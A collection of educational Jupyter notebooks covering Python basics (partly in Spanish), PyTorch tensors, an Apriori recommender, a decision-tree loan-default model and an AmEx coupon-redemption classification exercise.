Reto de Programación DiccionariosMientras que en las listas y tuplas se accede a los elementos por un número de indice, en los diccionarios se utilizan claves(numericas ó de texto) para acceder a los elementos. Los elementos guardados en cada clave son de diferentes tipos, incluso listas u otros diccionarios.```pythonint; str; float; bool, list, dict```Una diccionario se crea de la siguiente forma:```pythonmi_diccionario = {'grupo_1':4, 'grupo_2':6, 'grupo_3':7, 'grupo_4':3}```Acceder al valor de la clave `grupo_2`:```pythonprint (mi_diccionario['grupo_2'])```
###Code
# Ejemplo 1
mi_diccionario = {'grupo_1':4, 'grupo_2':6, 'grupo_3':7, 'grupo_4':3}
print (mi_diccionario['grupo_2'])
# Ejemplo 2 con diferentes tipos de elementos
informacion_persona = {'nombres':'Elon', 'apellidos':'Musk', 'edad':45, 'nacionalidad':'Sudafricano',
'educacion':['Administracion de empresas','Física'],'empresas':['Zip2','PyPal','SpaceX','SolarCity']}
print (informacion_persona['educacion'])
print (informacion_persona['empresas'])
###Output
['Administracion de empresas', 'Física']
['Zip2', 'PyPal', 'SpaceX', 'SolarCity']
###Markdown
Reto de Programación Estructuras de control condicionalesLas estructuras de control condicionales nos permiten evaluar si una o mas condiciones se cumplen, y respecto a estoejecutar la siguiente accion.Primero usamos:```pythonif```Despues algun operador relacional para comparar```python== igual que!= diferente de < menor que> mayor que<= menor igual que>= mayor igual que```Cuando se evalua mas de una conición:```pythonand, & (y)or, | (ó)```
###Code
# Ejemplo
color_semaforo = 'amarillo'
if color_semaforo == 'verde':
print ("Cruzar la calle")
else:
print ("Esperar")
# ejemplo
dia_semana = 'lunes'
if dia_semana == 'sabado' or dia_semana == 'domingo':
print ('Me levanto a las 10 de la mañana')
else:
print ('Me levanto antes de las 7am')
# Ejemplo
costo_compra = 90
if costo_compra <= 100:
print ("Pago en efectivo")
elif costo_compra > 100 and costo_compra < 300:
print ("Pago con tarjeta de débito")
else:
print ("Pago con tarjeta de crédito")
###Output
_____no_output_____
###Markdown
Reto de Programación Estructuras de control iterativas(cíclicas o bucles)Estas estructuras nos permiten ejecutar un mismo codigo, de manera repetida, mientras se cumpla una condición. Bucle WhileEste bucle ejecuta una misma acción mientras determinada condición se cumpla:```pythonanio = 2001while anio <= 2012: print ("Informes del Año", str(anio)) anio = anio + 1 aumentamos anio en 1```En este ejemplo la condición es menor que 2012
###Code
# ejemplo
anio = 2001
while anio <= 2012:
print ("Informes del Año", str(anio))
anio = anio + 1 # aumentamos anio en 1
# ejemplo
cuenta = 10
while cuenta >= 0:
print ('faltan '+str(cuenta)+' minutos')
cuenta += -1
###Output
faltan 10 minutos
faltan 9 minutos
faltan 8 minutos
faltan 7 minutos
faltan 6 minutos
faltan 5 minutos
faltan 4 minutos
faltan 3 minutos
faltan 2 minutos
faltan 1 minutos
faltan 0 minutos
###Markdown
Reto de Programación Bucle forEn Python el bucle for nos permite iterar sobre variables que guardan colecciones de datos, como : tuplas y listas.```pythonmi_lista = ['Juan', 'Antonio', 'Pedro', 'Herminio']for nombre in mi_lista: print (nombre)```En el codigo vemos que la orden es ir por cada uno de los elementos de la lista para imprimirlos.
###Code
# Ejemplo
mi_tupla = ('rosa', 'verde', 'celeste', 'amarillo')
for color in mi_tupla:
print (color)
# Ejemplo
dias_semana = ['lunes','martes','miercoles','jueves','viernes','sabado','domingo']
for i in dias_semana:
if (i == dias_semana[-1]) or (i == dias_semana[-2]):
print ('Hoy seguire aprendiendo de programación')
else:
print ('Hoy tengo que ir al colegio')
###Output
Hoy tengo que ir al colegio
Hoy tengo que ir al colegio
Hoy tengo que ir al colegio
Hoy tengo que ir al colegio
Hoy tengo que ir al colegio
Hoy seguire aprendiendo de programación
Hoy seguire aprendiendo de programación
|
Association Rule Learning (Recommending Models)/Apriori/Apiori.ipynb | ###Markdown
**Apriori**For building recommending system Importing Libraries
###Code
!pip install apyori
import numpy as np
import matplotlib.pyplot
import pandas as pd
###Output
_____no_output_____
###Markdown
Uploading Dataset
###Code
from google.colab import files
files.upload()
###Output
_____no_output_____
###Markdown
Data Preprocessing
###Code
dataset = pd.read_csv('Market_Basket_Optimisation.csv', header = None)
transactions = []
for i in range(0, 7501):
transactions.append([str(dataset.values[i,j]) for j in range(0, 20)])
print(transactions)
###Output
_____no_output_____
###Markdown
Training Apriori Modelmin support = 3*7 / 7501
###Code
from apyori import apriori
rules = apriori(transactions = transactions, min_support= 0.003, min_confidence = 0.2, min_lift = 3, min_length = 2, max_length = 2)
###Output
_____no_output_____
###Markdown
Visualising the results Displaying the first results coming directly from the output of the apriori function
###Code
results = list(rules)
results
def inspect(results):
lhs = [tuple(result[2][0][0])[0] for result in results]
rhs = [tuple(result[2][0][1])[0] for result in results]
supports = [result[1] for result in results]
confidences = [result[2][0][2] for result in results]
lifts = [result[2][0][3] for result in results]
return list(zip(lhs, rhs, supports, confidences, lifts))
resultsinDataFrame = pd.DataFrame(inspect(results), columns = ['Left Hand Side', 'Right Hand Side', 'Support', 'Confidence', 'Lift'])
###Output
_____no_output_____
###Markdown
Displaying the results non sorted
###Code
resultsinDataFrame
###Output
_____no_output_____
###Markdown
Displaying the results sorted by descending lifts
###Code
resultsinDataFrame.nlargest(n = 10, columns = 'Lift')
###Output
_____no_output_____ |
Decision_Tree/Loan_Defaulters_Student_Template.ipynb | ###Markdown
Load the dataset- Load the train data and using all your knowledge try to explore the different statistical properties of the dataset.
###Code
# Code starts here
train = pd.read_csv("train.csv")
# drop serial number
train.drop(columns=['Id', 'customer.id'],inplace=True)
print(train.head())
# Code ends here
###Output
credit.policy purpose int.rate installment log.annual.inc \
0 Yes debt_consolidation 12.53% 689.41 11.513725
1 Yes credit_card 10.20% 485.42 10.315597
2 Yes debt_consolidation 12.87% 121.08 11.238436
3 No all_other 15.37% 348.47 11.142007
4 Yes debt_consolidation 14.61% 344.76 10.308953
dti fico days.with.cr.line revol.bal revol.util pub.rec \
0 14.45 722 4291.000000 13171 51.8 0
1 12.87 752 5789.958333 14857 31.3 0
2 1.58 692 3391.000000 12135 85.5 0
3 11.01 687 5370.000000 10631 35.3 0
4 11.36 672 2429.958333 10544 57.0 0
inq.last.6mths delinq.2yrs paid.back.loan
0 Less than 5 No Yes
1 Less than 5 Yes Yes
2 Less than 5 No Yes
3 Less than 10 No Yes
4 Less than 5 Yes Yes
###Markdown
Visualize the data- Check for the categorical & continuous features. - Check out the best plots for plotting between categorical target and continuous features and try making some inferences from these plots.- Clean the data, apply some data preprocessing and engineering techniques.
###Code
# Code starts here
# Check the distribution of the target variable
#Storing value counts of target variable in 'fully_paid'
fully_paid=train['paid.back.loan'].value_counts()
#Plotting bar plot
plt.bar(fully_paid.index, fully_paid)
plt.show()
# From the column int.rate of 'train', remove the % character and convert the column into float.
# After that divide the values of 'int.rate' with 100 and store the result back to the column 'int.rate'
#Removing the last character from the values in column
train['int.rate'] = train['int.rate'].map(lambda x: str(x)[:-1])
#Dividing the column values by 100
train['int.rate']=train['int.rate'].astype(float)/100
#Storing all the numerical type columns in 'num_df'
num_df=train.select_dtypes(include=['number']).copy()
#Storing all the categorical type columns in 'cat_df'
cat_df=train.select_dtypes(include=['object']).copy()
# Visualizing Numerical Features
#Setting the figure size
plt.figure(figsize=(20,20))
#Storing the columns of 'num_df'
cols=list(num_df.columns)
print(cols)
#Creating subplots
fig,axes=plt.subplots(9,1, figsize=(10,20))
#Looping across rows
for i in range(9):
#Plotting boxplot
sns.boxplot(x=train['paid.back.loan'],y=num_df[cols[i]],ax=axes[i])
#Avoiding subplots overlapping
fig.tight_layout()
# Visualizing Categorical Features
#Storing the columns of 'cat_df'
cols=list(cat_df.columns)
#Setting up subplots
fig,axes=plt.subplots(2,2, figsize=(20,20))
#Looping through rows
for i in range(0,2):
#Looping through columns
for j in range(0,2):
#Plotting count plot
sns.countplot(x=train[cols[i*2+j]], hue=train['paid.back.loan'],ax=axes[i,j])
#Avoiding subplots overlapping
fig.tight_layout()
###Output
_____no_output_____
###Markdown
Model building- Separate the features and target.- Now let's come to the actual task, using Decision Tree, predict the `paid.back.loan`. Use different techniques you have learned to imporove the performance of the model.- Try improving upon the `accuracy_score` ([Accuracy Score](https://scikit-learn.org/stable/modules/generated/sklearn.metrics.accuracy_score.html))
###Code
# Code Starts here
# Split the data into train and test
X = train.drop(columns = ['paid.back.loan'])
y = train[['paid.back.loan']]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=3)
# Initializing a list of categorical columns & dropping the target column from the list
cat_cols = list(cat_df.columns)
cat_df = cat_cols.remove('paid.back.loan')
#Looping through categorical columns
for col in cat_cols:
#Filling null values with 'NA'
X_train[col].fillna('NA',inplace=True)
#Initalising a label encoder object
le=LabelEncoder()
#Fitting and transforming the column in X_train with 'le'
X_train[col]=le.fit_transform(X_train[col])
#Filling null values with 'NA'
X_test[col].fillna('NA',inplace=True)
#Fitting the column in X_test with 'le'
X_test[col]=le.transform(X_test[col])
# Replacing the values of y_train
y_train.replace({'No':0,'Yes':1},inplace=True)
# Replacing the values of y_test
y_test.replace({'No':0,'Yes':1},inplace=True)
#Initialising 'Decision Tree' model
model=DecisionTreeClassifier(random_state=0)
#Training the 'Decision Tree' model
model.fit(X_train, y_train)
#Finding the accuracy of 'Decision Tree' model
acc=model.score(X_test, y_test)
#Printing the accuracy
print("Accuracy: ", acc)
# Code ends here
# Let's see if pruning of decision tree improves its accuracy. We will use grid search to do the optimum pruning.
#Parameter grid
parameter_grid = {'max_depth': np.arange(3,10), 'min_samples_leaf': range(10,50,10)}
#Code starts here
#Initialising 'Decision Tree' model
model_2 = DecisionTreeClassifier(random_state=0)
#Applying Grid Search of hyper-parameters and finding the optimum 'Decision Tree' model
p_tree = GridSearchCV(model_2, parameter_grid, cv=5)
#Training the optimum 'Decision Tree' model
p_tree.fit(X_train, y_train)
#Finding the accuracy of the optimum 'Decision Tree' model
acc_2 = p_tree.score(X_test, y_test)
#Printing the accuracy
print("Accuracy: ", acc_2)
###Output
Accuracy: 0.8316659417137886
###Markdown
Prediction on the test data and creating the sample submission file.- Load the test data and store the `Id` column in a separate variable.- Perform the same operations on the test data that you have performed on the train data.- Create the submission file as a `csv` file consisting of the `Id` column from the test data and your prediction as the second column.
###Code
# Code Starts here
# Prediction on test data
# Read the test data
test = pd.read_csv('test.csv')
# Storing the id from the test file
id_ = test['Id']
# Apply the transformations on test
test.drop(columns=['Id', 'customer.id'],inplace=True)
#Removing the last character from the values in column
test['int.rate'] = test['int.rate'].map(lambda x: str(x)[:-1])
#Dividing the column values by 100
test['int.rate']=test['int.rate'].astype(float)/100
for col in cat_cols:
#Filling null values with 'NA'
test[col].fillna('NA',inplace=True)
#Initalising a label encoder object
le=LabelEncoder()
#Fitting and transforming the column in test with 'le'
le.fit(train[col])
test[col]=le.transform(test[col])
# Predict on the test data
y_pred_test = p_tree.predict(test)
y_pred_test = y_pred_test.flatten()
# Create a sample submission file
sample_submission = pd.DataFrame({'Id':id_,'paid.back.loan':y_pred_test})
print(sample_submission.head())
# Replacing the values of sample_submission
sample_submission.replace({1:'Yes', 0: 'No'},inplace=True)
# Convert the sample submission file into a csv file
sample_submission.to_csv('sample_submission_test.csv',index=False)
# Code ends here
###Output
Id paid.back.loan
0 5468 1
1 7530 1
2 501 1
3 2690 1
4 3691 1
|
source/full_code/basic_python_part1.ipynb | ###Markdown
Python 101 : Basic Python Programming [Part 1]by Limpapat Bussaban22/08/2021[datacamp] Cheat sheets http://datacamp-community-prod.s3.amazonaws.com/0eff0330-e87d-4c34-88d5-73e80cb955f2 Variables```variable = expression```Variable type```number --> int floatstringboolean```Keywords based on Python version 3.7```False await else import passNone break except in raiseTrue class finally is returnand continue for lambda tryas def from nonlocal whileassert del global not withasync elif if or yield```
###Code
# Int
a = 1
a
# This is comment
a = 1
(float(a) - 1)*99
# Float
float(a)
# String
str(a)
str(a) + "1"
bool(a)
bool(None)
type(a)
b = "Python!"
b
###Output
_____no_output_____
###Markdown
Basic operators* Arithmetic Operators``` + - * / % ** //```* Comparison (Relational) Operators```== != > = <=```* Assignment Operators```= += -= *= /= %= **= //=```* Logical Operators```and or not```* Bitwise Operators```& | ^ ~ >```* Membership Operators```in, not in```* Identity Operators```is, is not``` Collections String
###Code
sentence = " Hello Corgi. I am hungry. "
len(sentence)
sentence[1]
sentence[1:12]
sentence.strip()
len(sentence.strip())
sentence.strip().split(' ')
ss = ' '.join(sentence.strip().split(' '))
ss
###Output
_____no_output_____
###Markdown
List```list = [...]```
###Code
l = [b, a, a - 1, a]
l
len(l)
l[3] = 0
l
# NameError
l[4] = ":)"
l
l.append(":)")
l
len(l)
l.pop() #list.pop(index)
l
l.pop(3)
l
###Output
_____no_output_____
###Markdown
Tuple```tuple = (...)```
###Code
t = (0, 1, 2, 3, 4)
t
len(t)
t[0:3]
t[-1]
t[-3:]
# TypeError: Cannot edit tuple.
t[4] = 5
###Output
_____no_output_____
###Markdown
Set```set = {...}```
###Code
s = {1, 1, 2, 2, 2, 3, 3, 3, 3, 3, 4, 5, 5}
s
len(s)
0 in s
1 not in s
s1 = {5, 6, 6, 7}
print('s = ', s)
print('s1 = ', s1)
print('s is a subset of s1 : ', s <= s1)
print('s union s1 = ', s | s1)
print('s intersect s1 = ', s & s1)
print('s difference s1', s - s1)
print('s symetric difference s1 = ', s ^ s1)
###Output
s = {1, 2, 3, 4, 5}
s1 = {5, 6, 7}
s is a subset of s1 : False
s union s1 = {1, 2, 3, 4, 5, 6, 7}
s intersect s1 = {5}
s difference s1 {1, 2, 3, 4}
s symetric difference s1 = {1, 2, 3, 4, 6, 7}
###Markdown
Dictionary```dict = {key : value}```
###Code
grade = {
"A" : 80,
"B" : 70,
"C" : 60,
"D" : 50
}
grade
grade["A"]
grade["B+"] = 75
grade
d = {}
d["s001"] = "Dog"
d["s002"] = "Cat"
d
d["s001"]
###Output
_____no_output_____
###Markdown
PrintPrint in more detail: https://realpython.com/python-print/
###Code
?print
name = 'Limpapat'
age = 16
gpa = 10/3
print('Hi! \nMy name is', name, ', \nI\'m', age, 'years old, \nMy GPA:', gpa, '.')
print('Hi! \nMy name is %s, \nI\'m %d years old, \nMy GPA: %.2f' %(name, age, gpa))
print('Hi! \nMy name is {}, \nI\'m {} years old, \nMy GPA: {}.'.format(name, age, gpa))
print(f'Hi! \nMy name is {name}, \nI\'m {age} years old, \nMy GPA: {gpa}.')
###Output
Hi!
My name is Limpapat,
I'm 16 years old,
My GPA: 3.3333333333333335.
|
Chapter_3/Chapter_3.ipynb | ###Markdown
CHAPTER 3 Section 1 Playing with PyTorch tensors
###Code
import torch
data = torch.ones(3)
data
data[0], data[1]
float(data[0]), float(data[1])
data[1] = 4 # mutable
data
a = torch.tensor([4, 5, 6, 7])
a
a.dtype
float(a[2])
p = torch.tensor([[4, 2], [4, 5.6], [1.3, 13]], dtype=torch.float64)
p
p.shape
p[0]
p[0, 0], p[0, 1]
p[:, 0] # all rows, first column
p[None].shape
# example image
img = torch.rand(3, 28, 28) * 255 # channels x rows x columns
img
w = torch.tensor([0.2126, 0.7152, 0.0722])
batch = torch.rand(2, 3, 28, 28) * 255 # 2 is the number of examples
batch.shape
img.mean(-3).shape, batch.mean(-3).shape
w_un = w.unsqueeze(-1).unsqueeze(-1)
w_un.shape
img_weights = w_un * img
batch_weights = w_un * batch
img_weights.shape, batch_weights.shape
%matplotlib inline
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
img_gray = img_weights.sum(-3)
batch_gray = batch_weights.sum(-3)
img_gray.shape, batch_gray.shape
# trying to plot the images
from pylab import rcParams
rcParams['figure.figsize'] = 50, 50
img_n = img.resize(28, 28, 3)
batch_n = batch.resize(28, 28, 3, 2)
plt.subplot(2, 3, 1)
plt.title("Image color", fontsize=30)
fig = plt.imshow(img_n)
plt.subplot(2, 3, 2)
plt.title("Batch 1 color", fontsize=30)
plt.imshow(batch_n[..., 0])
plt.subplot(2, 3, 3)
plt.title("Batch 2 color", fontsize=30)
plt.imshow(batch_n[..., 1])
plt.subplot(2, 3, 4)
plt.title("Image grayscale", fontsize=30)
fig = plt.imshow(img_gray)
batch_n = batch_gray.resize(28, 28, 2)
plt.subplot(2, 3, 5)
plt.title("Batch 1 grayscale", fontsize=30)
plt.imshow(batch_n[..., 0])
plt.subplot(2, 3, 6)
plt.title("Batch 2 grayscale", fontsize=30)
plt.imshow(batch_n[..., 1])
plt.show()
# different dtypes in pytorch
torch.int8, torch.int16, torch.int32, torch.int64
torch.float, torch.float16, torch.float32, torch.float64
torch.bool
# TO CHANGE THE DTYPE TWO METHODS ARE THERE
print(p.dtype)
print(p.int().dtype)
print(p.to(torch.int64).dtype)
# trying to understand the underlying storage working of tensors
print(p)
p.storage() # storage is where the data is stored in a 1D array (always)
# regardless of the tensor's dimension
st = p.storage()
st[3] = 13123123123
# this will change the actual tensor too
print(st)
p
# methods with a trailing _ changes the tensor being operated on
# instead of creating a new copy with the change
p.zero_()
p
p = torch.rand(2, 4).to(dtype=torch.float32)
p
p.t() # shorthand transpose function
p.is_contiguous()
# tensor to numpy
n = p.numpy()
n
# numpy to tensor
f = torch.from_numpy(n)
f
# saving tensors
torch.save(p, '../Chapter_3/p.t')
# reading tensors from file
p_n = torch.load('../Chapter_3/p.t')
p_n
###Output
_____no_output_____ |
.ipynb_checkpoints/ML on Amex Dataset Final-checkpoint.ipynb | ###Markdown
Problem Statement Predicting Coupon Redemption XYZ Credit Card company regularly helps it’s merchants understand their data better and take key business decisions accurately by providing machine learning and analytics consulting. ABC is an established Brick & Mortar retailer that frequently conducts marketing campaigns for its diverse product range. As a merchant of XYZ, they have sought XYZ to assist them in their discount marketing process using the power of machine learning. Can you wear the AmExpert hat and help out ABC?Discount marketing and coupon usage are very widely used promotional techniques to attract new customers and to retain & reinforce loyalty of existing customers. The measurement of a consumer’s propensity towards coupon usage and the prediction of the redemption behaviour are crucial parameters in assessing the effectiveness of a marketing campaign.ABC’s promotions are shared across various channels including email, notifications, etc. A number of these campaigns include coupon discounts that are offered for a specific product/range of products. The retailer would like the ability to predict whether customers redeem the coupons received across channels, which will enable the retailer’s marketing team to accurately design coupon construct, and develop more precise and targeted marketing strategies.The data available in this problem contains the following information, including the details of a sample of campaigns and coupons used in previous campaigns -User Demographic Details Campaign and coupon Details Product details Previous transactions Based on previous transaction & performance data from the last 18 campaigns, predict the probability for the next 10 campaigns in the test set for each coupon and customer combination, whether the customer will redeem the coupon or not?Dataset Description Here is the schema for the different data tables available. The detailed data dictionary is provided next.You are provided with the following files in train.zip:train.csv: Train data containing the coupons offered to the given customers under the 18 campaignsVariable Definition id Unique id for coupon customer impression campaign_id Unique id for a discount campaign coupon_id Unique id for a discount coupon customer_id Unique id for a customer redemption_status (target) (0 - Coupon not redeemed, 1 - Coupon redeemed) campaign_data.csv: Campaign information for each of the 28 campaignsVariable Definition campaign_id Unique id for a discount campaign campaign_type Anonymised Campaign Type (X/Y) start_date Campaign Start Date end_date Campaign End Date coupon_item_mapping.csv: Mapping of coupon and items valid for discount under that couponVariable Definition coupon_id Unique id for a discount coupon (no order) item_id Unique id for items for which given coupon is valid (no order) customer_demographics.csv: Customer demographic information for some customersVariable Definition customer_id Unique id for a customer age_range Age range of customer family in years marital_status Married/Single rented 0 - not rented accommodation, 1 - rented accommodation family_size Number of family members no_of_children Number of children in the family income_bracket Label Encoded Income Bracket (Higher income corresponds to higher number) customer_transaction_data.csv: Transaction data for all customers for duration of campaigns in the train dataVariable Definition date Date of Transaction customer_id Unique id for a customer item_id Unique id for item quantity quantity of item bought selling_price Sales value of the transaction other_discount Discount from other sources such as manufacturer coupon/loyalty card coupon_discount Discount availed from retailer coupon item_data.csv: Item information for each item sold by the retailerVariable Definition item_id Unique id for item brand Unique id for item brand brand_type Brand Type (local/Established) category Item Category test.csv: Contains the coupon customer combination for which redemption status is to be predictedVariable Definition id Unique id for coupon customer impression campaign_id Unique id for a discount campaign coupon_id Unique id for a discount coupon customer_id Unique id for a customer *Campaign, coupon and customer data for test set is also contained in train.zipsample_submission.csv: This file contains the format in which you have to submit your predictions.To summarise the entire process:Customers receive coupons under various campaigns and may choose to redeem it. They can redeem the given coupon for any valid product for that coupon as per coupon item mapping within the duration between campaign start date and end date Next, the customer will redeem the coupon for an item at the retailer store and that will reflect in the transaction table in the column coupon_discount.
###Code
'''
https://www.kaggle.com/bharath901/amexpert-2019/data#
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import classification_report, precision_score, recall_score, f1_score, accuracy_score
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import confusion_matrix
from sklearn.feature_selection import RFE
import csv
###Output
_____no_output_____
###Markdown
Import Function to various files
###Code
'''
Defining a Class to import the Data into a pandas DataFrame for analysis
- Method to storing the Data into a DataFrame
- Method to extracting Information of the Data to understand datatype associated with each column
- Method to describing the Data
- Method to understanding Null values distribution
- Method to understanding Unique values distribution
'''
class import_data():
'''
Method to extract and store the data as pandas dataframe
'''
def __init__(self,path):
self.raw_data = pd.read_csv(path)
display (self.raw_data.head(10))
'''
Method to extract information about the data and display
'''
def get_info(self):
display (self.raw_data.info())
'''
Method to describe the data
'''
def get_describe(self):
display (self.raw_data.describe())
'''
Mehtod to understand Null values distribution
'''
def null_value(self):
col_null = pd.DataFrame(self.raw_data.isnull().sum()).reset_index()
col_null.columns = ['DataColumns','NullCount']
col_null['NullCount_Pct'] = round((col_null['NullCount']/self.raw_data.shape[0])*100,2)
display (col_null)
'''
Method to understand Unique values distribution
'''
def unique_value(self):
col_uniq = pd.DataFrame(self.raw_data.nunique()).reset_index()
col_uniq.columns = ['DataColumns','UniqCount']
col_uniq_cnt = pd.DataFrame(self.raw_data.count(axis=0)).reset_index()
col_uniq_cnt.columns = ['DataColumns','UniqCount']
col_uniq['UniqCount_Pct'] = round((col_uniq['UniqCount']/col_uniq_cnt['UniqCount'])*100,2)
display (col_uniq)
'''
Method to return the dataset as dataframe
'''
def return_data(self):
base_loan_data = self.raw_data
return (base_loan_data)
'''
Evaluation and Analysis starts here for train.csv
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/train.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
train_data = data.return_data()
'''
Evaluation and Analysis starts here for Campaign Data
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/campaign_data.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
campaign_data = data.return_data()
'''
Evaluation and Analysis starts here for Coupon Data
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/coupon_item_mapping.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
coupon_data = data.return_data()
'''
Evaluation and Analysis starts here for Item Data
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/item_data.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
item_data = data.return_data()
'''
Evaluation and Analysis starts here for Customer Demographic
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/customer_demographics.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
cust_demo_data = data.return_data()
'''
Evaluation and Analysis starts here for Customer Transaction
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/customer_transaction_data.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
cust_tran_data = data.return_data()
'''
Function to write the experiment result to csv file
'''
file_write_cnt = 1
# writing the baseline results to csv file
def write_file(F1,F2,F3,F4,F5,F6,F7,F8,F9,F10,F11):
# field names
fields = ['Expt No','Outlier Treatment','Skewness Treatment','Null Treatment',
'No of Features','Feature Selected','Model Used','Precision for 1',
'Recall for 1','Accuracy','Comment']
# data in the file
rows = [[F1,F2,F3,F4,F5,F6,F7,F8,F9,F10,F11]]
# name of csv file
filename = "./data/score_dashboard.csv"
if int(F1) == 1:
# writing to csv file
with open(filename, 'w') as csvfile:
# creating a csv writer object
csvwriter = csv.writer(csvfile)
# writing the fields
csvwriter.writerow(fields)
# writing the data rows
csvwriter.writerows(rows)
if int(F1) > 1:
# writing to csv file
with open(filename, 'a') as csvfile:
# creating a csv writer object
csvwriter = csv.writer(csvfile)
# writing the data rows
csvwriter.writerows(rows)
'''
Function to convert the date into quarter
'''
def date_q(date,split):
if split == '/':
"""
Convert Date to Quarter when separated with /
"""
qdate = date.strip().split('/')[1:]
qdate1 = qdate[0]
if qdate1 in ['01','02','03']:
return (str('Q1' + '-' + qdate[1]))
if qdate1 in ['04','05','06']:
return (str('Q2' + '-' + qdate[1]))
if qdate1 in ['07','08','09']:
return (str('Q3' + '-' + qdate[1]))
if qdate1 in ['10','11','12']:
return (str('Q4' + '-' + qdate[1]))
if split == '-':
"""
Convert Date to Quarter when separated with -
"""
qdate = date.strip().split('-')[0:2]
qdate1 = qdate[1]
qdate2 = str(qdate[0])
if qdate1 in ['01','02','03']:
return (str('Q1' + '-' + qdate2[2:]))
if qdate1 in ['04','05','06']:
return (str('Q2' + '-' + qdate2[2:]))
if qdate1 in ['07','08','09']:
return (str('Q3' + '-' + qdate2[2:]))
if qdate1 in ['10','11','12']:
return (str('Q4' + '-' + qdate2[2:]))
'''
Function to aggregate Customer Transaction Data
'''
def tran_summation(column):
cust_tran_data_expt['tot_'+column] = pd.DataFrame(cust_tran_data_expt.groupby(['customer_id','item_id','coupon_id'])[column].transform('sum'))
cust_tran_data_expt.drop([column],axis=1,inplace=True)
def tran_summation_1(column):
cust_tran_data_expt['tot_'+column] = pd.DataFrame(cust_tran_data_expt.groupby(['customer_id','item_id','coupon_id','tran_date_q'])[column].transform('sum'))
cust_tran_data_expt.drop([column],axis=1,inplace=True)
def tran_summation_2(column):
cust_tran_data_expt['tot_'+column] = pd.DataFrame(cust_tran_data_expt.groupby(['customer_id','coupon_id'])[column].transform('sum'))
cust_tran_data_expt.drop([column],axis=1,inplace=True)
'''
Function to label encode
'''
def label_encode(column):
train_data_merge[column] = train_data_merge[column].astype('category').cat.codes
'''
Function to convert Categorical column to Integer using Coupon Redemption percentage
'''
def cat_percent(column):
train_data_merge[column+'_redeem_sum'] = pd.DataFrame(train_data_merge.groupby([column])['redemption_status'].transform('sum'))
train_data_merge[column+'_redeem_count'] = pd.DataFrame(train_data_merge.groupby([column])['redemption_status'].transform('count'))
train_data_merge[column+'_redeem_percent'] = pd.DataFrame(train_data_merge[column+'_redeem_sum']*100/train_data_merge[column+'_redeem_count'])
train_data_merge.drop(column,axis=1,inplace=True)
train_data_merge.drop([column+'_redeem_sum'],axis=1,inplace=True)
train_data_merge.drop([column+'_redeem_count'],axis=1,inplace=True)
###Output
_____no_output_____
###Markdown
To define baseline model with basic data preprocessing.
###Code
cust_demo_data_expt = cust_demo_data.copy()
cust_demo_data_expt['marital_status'].fillna('Unspecified',inplace=True)
cust_demo_data_expt['no_of_children'].fillna(0,inplace=True)
cust_demo_data_expt['age_range'].replace(['18-25','26-35','36-45','46-55','56-70','70+'],[18,26,36,46,56,70],inplace=True)
cust_demo_data_expt['family_size'].replace('5+',5,inplace=True)
cust_demo_data_expt['no_of_children'].replace('3+',3,inplace=True)
cust_tran_data_expt = cust_tran_data.copy()
cust_tran_data_expt = pd.merge(cust_tran_data_expt,coupon_data,how='inner',on='item_id')
cust_tran_data_expt.drop('date',axis=1,inplace=True)
for column in ['quantity','coupon_discount','other_discount','selling_price']:
tran_summation(column)
cust_tran_data_expt.drop_duplicates(subset=['customer_id','item_id','coupon_id'], keep='first', inplace=True)
train_data_merge = pd.merge(train_data,cust_tran_data_expt,how='inner',on=['customer_id','coupon_id'])
train_data_merge = pd.merge(train_data_merge,cust_demo_data_expt,how='left',on='customer_id')
train_data_merge = pd.merge(train_data_merge,item_data,how='left',on='item_id')
train_data_merge.drop('marital_status',axis=1,inplace=True)
train_data_merge.fillna({'age_range':0,'rented':0,'family_size':0,'no_of_children':0,'income_bracket':0},inplace=True)
train_data_merge['family_size'].astype('int8')
train_data_merge['no_of_children'].astype('int8')
train_data_merge = pd.get_dummies(train_data_merge, columns=['brand_type','category'], drop_first=False)
X = train_data_merge.drop('redemption_status', axis=1)
y = train_data_merge['redemption_status']
X_train,X_test,y_train,y_test = train_test_split(X,y,train_size=0.7,random_state=7)
# defining the model
classifier = LogisticRegression(solver='lbfgs',max_iter=10000)
# fitting the model
classifier.fit(X_train,y_train)
# predicting test result with model
y_pred = classifier.predict(X_test)
# Creating Classification report for Logistic Regression Baseline model
print ("Classification Report for Baseline Logistic Regression")
print(classification_report(y_test,y_pred))
report = pd.DataFrame(classification_report(y_test,y_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X.columns),list(X.columns),'Logistic Regresssion',report['precision'][1],report['recall'][1],report['support']['accuracy'],'Baseline Model')
file_write_cnt = file_write_cnt + 1
# defining the model
classifier = RandomForestClassifier(n_estimators=100)
# fitting the model
classifier.fit(X_train,y_train)
# predicting test result with model
y_pred = classifier.predict(X_test)
# Creating Classification report for RandomForest Classifier Baseline model
print ("Classification Report for Baseline RandomForest Classifier")
print(classification_report(y_test,y_pred))
report = pd.DataFrame(classification_report(y_test,y_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X.columns),X.columns,'Random Forest Classifier',report['precision'][1],report['recall'][1],report['support']['accuracy'],'Baseline Model')
file_write_cnt += 1
###Output
Classification Report for Baseline RandomForest Classifier
precision recall f1-score support
0 0.98 1.00 0.99 20278
